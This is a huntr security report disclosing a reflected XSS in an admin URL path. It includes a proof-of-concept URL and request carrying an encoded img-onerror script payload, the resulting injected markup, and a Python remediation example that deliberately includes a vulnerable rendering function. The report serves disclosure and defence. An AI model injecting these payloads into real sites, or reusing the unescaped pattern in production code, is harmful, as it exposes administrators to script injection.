huntr report B00E6986-64E7-464E-BA44-E42476BFCDC4
History: Aug 04, 2023 - 10:42 a.m.

Reflected XSS in URL path of '/admin/controllers/edit/activity/perms/'

2023-08-04 10:42:58
legpains
www.huntr.dev
xss
url input
sanitization
admin session
reflected

EPSS: 0.0004 (Low)
EPSS percentile: 14.2%

Description

/admin/controllers/edit/activity/perms/ takes input directly from the URL path without sufficient sanitization, leading to a reflected XSS.

A valid admin session is required; without it, the user is redirected to the login page instead of the affected page.

Proof of Concept

  1. Log in as an administrator
  2. Visit the following URL to trigger JavaScript code: http://icms.local/admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E

Payload

"&gt;<img src>

Request:

GET /admin/controllers/edit/activity/perms/%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1
Host: icms.local
[...]

The inserted input would then be reflected on the page like this:

<form action="/admin/controllers/edit/activity/perms_save/"><img src=a onerror=alert(location.origin)>" method="post">

Remedial Action

It is recommended to sanitize the input before it is reflected on the affected page.
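The example below is added here to illustrate the remediation; it is not the project's own code and the project's real language and template are not known from the report. It assumes a Python-style handler that builds the form tag the report shows, takes the route prefix and the decoded request line from the PoC above, and contrasts the reflecting behaviour the report describes with two defensive controls: HTML attribute encoding of the reflected segment, and an allow-list check on the segment (the regex `SAFE_SUFFIX` is an assumed policy, not one from the page).

```python
import html
import re
from urllib.parse import unquote

# Constructed request line, copied from the report's proof-of-concept request.
REQUEST_LINE = (
    "GET /admin/controllers/edit/activity/perms/"
    "%22%3E%3Cimg%20src%3da%20onerror%3dalert(location.origin)%3E HTTP/1.1"
)

ROUTE_PREFIX = "/admin/controllers/edit/activity/perms/"

# Assumed allow-list policy for the trailing path segment: identifiers only.
SAFE_SUFFIX = re.compile(r"^[A-Za-z0-9_-]*$")


def path_suffix_from_request(request_line: str) -> str:
    """Return the percent-decoded trailing segment after the route prefix.

    This mirrors what a typical framework hands the controller: the raw,
    decoded path, which is exactly what gets reflected in the report.
    """
    path = request_line.split(" ")[1]
    if not path.startswith(ROUTE_PREFIX):
        raise ValueError("request does not target the affected route")
    return unquote(path[len(ROUTE_PREFIX):])


def render_form_vulnerable(suffix: str) -> str:
    """Reflect the raw suffix into an attribute value (the reported behaviour).

    A suffix containing a double quote closes the action attribute and the
    remainder is parsed as new markup.
    """
    return (
        '<form action="/admin/controllers/edit/activity/perms_save/'
        f'{suffix}" method="post">'
    )


def render_form_safe(suffix: str) -> str:
    """Encode for the HTML attribute context before reflecting.

    html.escape with quote=True rewrites & < > " and ', so the suffix can no
    longer terminate the attribute or start a tag.
    """
    return (
        '<form action="/admin/controllers/edit/activity/perms_save/'
        f'{html.escape(suffix, quote=True)}" method="post">'
    )


def suffix_is_well_formed(suffix: str) -> bool:
    """Allow-list check: reject the segment outright if it is not an identifier."""
    return SAFE_SUFFIX.fullmatch(suffix) is not None


def attribute_breakout(rendered: str) -> bool:
    """Crude detector for a successful breakout: more than the one expected tag."""
    return rendered.count("<") > 1


if __name__ == "__main__":
    suffix = path_suffix_from_request(REQUEST_LINE)
    print("decoded suffix:", suffix)
    print("allow-listed:", suffix_is_well_formed(suffix))
    print("vulnerable:", render_form_vulnerable(suffix))
    print("safe:      ", render_form_safe(suffix))
```

Encoding is the control that fixes the reported sink; the allow-list is a second layer that lets the handler reject malformed segments before any rendering happens. Either way the decision must happen server-side, because the report's payload arrives fully formed in the request path.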
